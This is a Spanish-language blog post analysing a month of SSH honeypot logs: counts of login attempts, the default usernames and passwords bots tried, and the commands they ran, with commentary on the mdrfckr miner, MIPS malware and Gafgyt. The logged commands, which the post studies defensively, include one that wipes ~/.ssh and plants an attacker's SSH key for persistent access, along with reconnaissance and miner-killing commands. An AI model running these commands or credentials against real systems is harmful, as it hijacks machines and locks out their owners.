Lo que obtienes tras ejecutar un honeypot SSH 30 días

¿Qué es un honeypot?

Un honeypot detecta y registra ataques cuando un atacante intenta infiltrarse en un sistema. El honeypot que discutiremos aquí es un honeypot SSH.

¿Por qué?

No tengo idea, lo hice solo con fines de investigación y satisfacción personal…

Entorno

SO: Ubuntu 24.04 LTS x86_64 
Núcleo: 6.8.0-31-generic

Intentos de inicio de sesión

cat X.log | grep -c "login attempt"
11599

Hubo un total de 11,599 intentos de inicio de sesión. Dividido entre 30 días, esto significa un promedio de 386 intentos de inicio de sesión por día.

Usuarios usados

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
   8181 root
    977 345gs5662d34
    359 admin
    198 pi
    105 0
     71 ubuntu
     51 ubnt
     46 support
     37 user
     30 oracle

Como se esperaba, hay muchos ataques que apuntan a nombres de usuario habituales y por defecto.

Para el usuario 345gs5662d34, según la Universidad de Aalborg de Dinamarca, esta podría ser la credencial por defecto para un teléfono IP Polycom CX600.

Consúltelo aquí:
SweetCam: un Honeypot para cámaras IP

Contraseñas

cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
    977 345gs5662d34
    967 3245gs5662d34
    246 admin
    239 123456
    208 password
    155 0
     88 root
     75 raspberry
     73 123
     66 raspberryraspberry993311

Una vez más, la misma que la contraseña por defecto para el teléfono IP Polycom CX600.

Comandos ejecutados después del inicio de sesión

cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
   6775 echo -e "\x6F\x6B"
   1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
   1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
    320 uname -s -v -n -r -m
    112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
     87 uname -a
     29 ps | grep '[Mm]iner'
     29 ps -ef | grep '[Mm]iner'
     29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/ /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/
     29 ifconfig
     29 echo Hi | cat -n
     29 cat /proc/cpuinfo
     29 /ip cloud print
     23 whoami
     23 which ls
     23 w
     23 uname -m
     23 uname
     23 top
     23 lscpu | grep Model
     23 ls -lh $(which ls)
     23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
     23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
     23 crontab -l
     23 cat /proc/cpuinfo | grep name | wc -l
     23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
     23 cat /proc/cpuinfo | grep model | grep name | wc -l

Ahora comienza la parte interesante.

El script oinasf

La ejecución de un misterioso script, ./oinasf, seguida de intentos para leer y mostrar el contenido ejecutable del sistema, indica una estrategia de sondeo para vulnerabilidades o información valiosa. El uso de /ip cloud print sugiere que los bots apuntan a routers MikroTik para acceder o interrumpir servicios basados en la nube, mientras que uname -s -m les proporciona detalles esenciales sobre el sistema operativo y la arquitectura de la máquina, valiosos para diseñar acciones posteriores adaptadas a las características del sistema. En conclusión, estos comandos representan una estrategia clara para infiltrarse, evaluar y establecer control sobre sistemas objetivo. Enfatizan la preferencia de los bots por la manipulación directa y el acceso sostenido, destacando la necesidad crítica de defensas robustas contra tácticas comunes pero potencialmente devastadoras.

El minero de criptomonedas mdrfckr

Este minero simplemente crearía un trabajo cron que eliminaría todo en la carpeta .ssh, añadiría una única clave ssh y bloquearía a otros usuarios.

Después mataría a otros mineros si existen y tendría el campo libre.

Puede revisar este repositorio de alguien que ya fue hackeado y en cuyo servidor se usó este minero: Dump del minero de criptomonedas que se instaló en mi sistema - Github

El malware MIPS

Probablemente otro malware de arquitectura MIPS (Multiprocesador sin etapas de tubería interbloqueadas), que apunta a routers y dispositivos IoT.

Aquí hay una buena lectura y análisis del comportamiento de un malware MIPS:
Análisis de un Backdoor/Bot para la plataforma MIPS

El script Sakura.sh

Este script es parte del malware Gafgyt.

Gafgyt, también conocido como BASHLITE, es un botnet que afecta a dispositivos del Internet de las cosas (IoT) y sistemas basados en Linux. El malware busca comprometer y controlar estos dispositivos, a menudo explotando contraseñas débiles o por defecto, así como vulnerabilidades conocidas. Gafgyt existe desde 2014 y ha evolucionado en múltiples variantes, cada una con su propio conjunto de características y capacidades, incluyendo la habilidad de lanzar ataques distribuidos de denegación de servicio (DDoS).

Aquí hay Un análisis detallado del malware Gafgyt que apunta a dispositivos IoT